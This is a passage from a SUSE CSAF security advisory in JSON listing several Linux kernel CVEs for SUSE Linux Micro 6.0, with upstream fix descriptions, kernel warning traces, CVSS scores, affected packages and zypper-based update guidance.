"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40351"
},
{
"cve": "CVE-2025-40355",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40355"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysfs: check visibility before changing group attribute ownership\n\nSince commit 0c17270f9b92 (\"net: sysfs: Implement is_visible for\nphys_(port_id, port_name, switch_id)\"), __dev_change_net_namespace() can\nhit WARN_ON() when trying to change owner of a file that isn\u0027t visible.\nSee the trace below:\n\n WARNING: CPU: 6 PID: 2938 at net/core/dev.c:12410 __dev_change_net_namespace+0xb89/0xc30\n CPU: 6 UID: 0 PID: 2938 Comm: incusd Not tainted 6.17.1-1-mainline #1 PREEMPT(full) 4b783b4a638669fb644857f484487d17cb45ed1f\n Hardware name: Framework Laptop 13 (AMD Ryzen 7040Series)/FRANMDCP07, BIOS 03.07 02/19/2025\n RIP: 0010:__dev_change_net_namespace+0xb89/0xc30\n [...]\n Call Trace:\n \u003cTASK\u003e\n ? if6_seq_show+0x30/0x50\n do_setlink.isra.0+0xc7/0x1270\n ? __nla_validate_parse+0x5c/0xcc0\n ? security_capable+0x94/0x1a0\n rtnl_newlink+0x858/0xc20\n ? update_curr+0x8e/0x1c0\n ? update_entity_lag+0x71/0x80\n ? sched_balance_newidle+0x358/0x450\n ? psi_task_switch+0x113/0x2a0\n ? __pfx_rtnl_newlink+0x10/0x10\n rtnetlink_rcv_msg+0x346/0x3e0\n ? sched_clock+0x10/0x30\n ? __pfx_rtnetlink_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x59/0x110\n netlink_unicast+0x285/0x3c0\n ? __alloc_skb+0xdb/0x1a0\n netlink_sendmsg+0x20d/0x430\n ____sys_sendmsg+0x39f/0x3d0\n ? import_iovec+0x2f/0x40\n ___sys_sendmsg+0x99/0xe0\n __sys_sendmsg+0x8a/0xf0\n do_syscall_64+0x81/0x970\n ? __sys_bind+0xe3/0x110\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? sock_alloc_file+0x63/0xc0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? alloc_fd+0x12e/0x190\n ? put_unused_fd+0x2a/0x70\n ? do_sys_openat2+0xa2/0xe0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? exc_page_fault+0x7e/0x1a0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n [...]\n \u003c/TASK\u003e\n\nFix this by checking is_visible() before trying to touch the attribute.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40355",
"url": "https://www.suse.com/security/cve/CVE-2025-40355"
},
{
"category": "external",
"summary": "SUSE Bug 1255261 for CVE-2025-40355",
"url": "https://bugzilla.suse.com/1255261"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40355"
},
{
"cve": "CVE-2025-40360",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40360"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sysfb: Do not dereference NULL pointer in plane reset\n\nThe plane state in __drm_gem_reset_shadow_plane() can be NULL. Do not\nderef that pointer, but forward NULL to the other plane-reset helpers.\nClears plane-\u003estate to NULL.\n\nv2:\n- fix typo in commit description (Javier)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40360",
"url": "https://www.suse.com/security/cve/CVE-2025-40360"
},
{
"category": "external",
"summary": "SUSE Bug 1255095 for CVE-2025-40360",
"url": "https://bugzilla.suse.com/1255095"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40360"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68168",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68168"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: fix uninitialized waitqueue in transaction manager\n\nThe transaction manager initialization in txInit() was not properly\ninitializing TxBlock[0].waitor waitqueue, causing a crash when\ntxEnd(0) is called on read-only filesystems.\n\nWhen a filesystem is mounted read-only, txBegin() returns tid=0 to\nindicate no transaction. However, txEnd(0) still gets called and\ntries to access TxBlock[0].waitor via tid_to_tblock(0), but this\nwaitqueue was never initialized because the initialization loop\nstarted at index 1 instead of 0.\n\nThis causes a \u0027non-static key\u0027 lockdep warning and system crash:\n INFO: trying to register non-static key in txEnd\n\nFix by ensuring all transaction blocks including TxBlock[0] have\ntheir waitqueues properly initialized during txInit().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68168",
"url": "https://www.suse.com/security/cve/CVE-2025-68168"
},
{
"category": "external",
"summary": "SUSE Bug 1255100 for CVE-2025-68168",
"url": "https://bugzilla.suse.com/1255100"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68168"
},
{
"cve": "CVE-2025-68171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68171"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Ensure XFD state on signal delivery\n\nSean reported [1] the following splat when running KVM tests:\n\n WARNING: CPU: 232 PID: 15391 at xfd_validate_state+0x65/0x70\n Call Trace:\n \u003cTASK\u003e\n fpu__clear_user_states+0x9c/0x100\n arch_do_signal_or_restart+0x142/0x210\n exit_to_user_mode_loop+0x55/0x100\n do_syscall_64+0x205/0x2c0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nChao further identified [2] a reproducible scenario involving signal\ndelivery: a non-AMX task is preempted by an AMX-enabled task which\nmodifies the XFD MSR.\n\nWhen the non-AMX task resumes and reloads XSTATE with init values,\na warning is triggered due to a mismatch between fpstate::xfd and the\nCPU\u0027s current XFD state. fpu__clear_user_states() does not currently\nre-synchronize the XFD state after such preemption.\n\nInvoke xfd_update_state() which detects and corrects the mismatch if\nthere is a dynamic feature.\n\nThis also benefits the sigreturn path, as fpu__restore_sig() may call\nfpu__clear_user_states() when the sigframe is inaccessible.\n\n[ dhansen: minor changelog munging ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68171",
"url": "https://www.suse.com/security/cve/CVE-2025-68171"
},
{
"category": "external",
"summary": "SUSE Bug 1255255 for CVE-2025-68171",
"url": "https://bugzilla.suse.com/1255255"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68171"
},
{
"cve": "CVE-2025-68172",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68172"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: aspeed - fix double free caused by devm\n\nThe clock obtained via devm_clk_get_enabled() is automatically managed\nby devres and will be disabled and freed on driver detach. Manually\ncalling clk_disable_unprepare() in error path and remove function\ncauses double free.\n\nRemove the manual clock cleanup in both aspeed_acry_probe()\u0027s error\npath and aspeed_acry_remove().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68172",
"url": "https://www.suse.com/security/cve/CVE-2025-68172"
},
{
"category": "external",
"summary": "SUSE Bug 1255253 for CVE-2025-68172",
"url": "https://bugzilla.suse.com/1255253"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68172"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
